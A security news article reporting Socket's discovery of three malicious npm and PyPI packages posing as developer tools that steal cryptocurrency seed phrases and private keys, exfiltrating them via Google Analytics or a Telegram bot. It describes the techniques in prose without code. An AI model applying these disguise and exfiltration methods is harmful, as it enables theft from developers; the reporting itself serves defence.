Threat Actors Leverage npm and PyPI with Impersonated Dev Tools for Credential Theft

The Socket Threat Research Team has unearthed a trio of malicious packages, two hosted on the Python Package Index (PyPI) and one on the npm registry, designed to silently pilfer cryptocurrency secrets, including mnemonic seed phrases and private keys.

Released between 2021 and 2024, these packages, under the guise of harmless developer tools, have been downloaded thousands of times, showcasing a growing trend in software supply chain attacks targeting open-source ecosystems.

Subtle Subversion in Open Source

The npm package react-native-scrollpageviewtest, masquerading as a page-scrolling helper, has been downloaded 1215 times.

Its modus operandi involves an intricate combination of obfuscation and evasion techniques.

Once installed, it dynamically loads the host React Native wallet engine to extract sensitive data, which is then encoded in Base64 and stealthily exfiltrated to the control server using Google Analytics as a seemingly innocuous endpoint for data transmission.

This method not only evades detection but also leverages the trust placed in Google’s analytics services.

On PyPI, web3x and herewalletbot represent similar tactics but with nuanced delivery mechanisms.

Web3x, appearing as an Ethereum balance checker, has gained over 3400 downloads.

It tricks users into providing their seed phrases by offering to check wallet balances and subsequently sends the stolen credentials to a Telegram bot controlled by the attackers.

Herewalletbot, with 3425 downloads, automates the process even further by guiding users through a Telegram chat interface where they are prompted to enter their mnemonic seed phrase, which is then harvested without their knowledge.

The Deceptive Dance with Developers

According to the Report, these packages illustrate the sophistication and cunning nature of current cyber threats.

By embedding themselves into development tools and workflows, they position themselves to intercept the most sensitive information, leveraging the inherent trust developers place in open-source packages.

This breach not only compromises individual developers but poses systemic risks to organizations relying on these ecosystems for software development.

The ongoing presence of these packages on npm and PyPI until recently highlights a critical need for enhanced security protocols within the software supply chain.

Developers and organizations must adopt proactive security measures like source-code review, runtime behavior monitoring, and dependency analysis to safeguard against such threats.

This discovery serves as a stark reminder of the critical importance of vigilance in software component usage.

Developers are urged to never share their mnemonic seed phrase and private keys under any circumstances, as these are the keys to their digital assets.

Any package requesting such information should be immediately flagged as suspicious and reported.

Indicators of Compromise (IOCs)

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!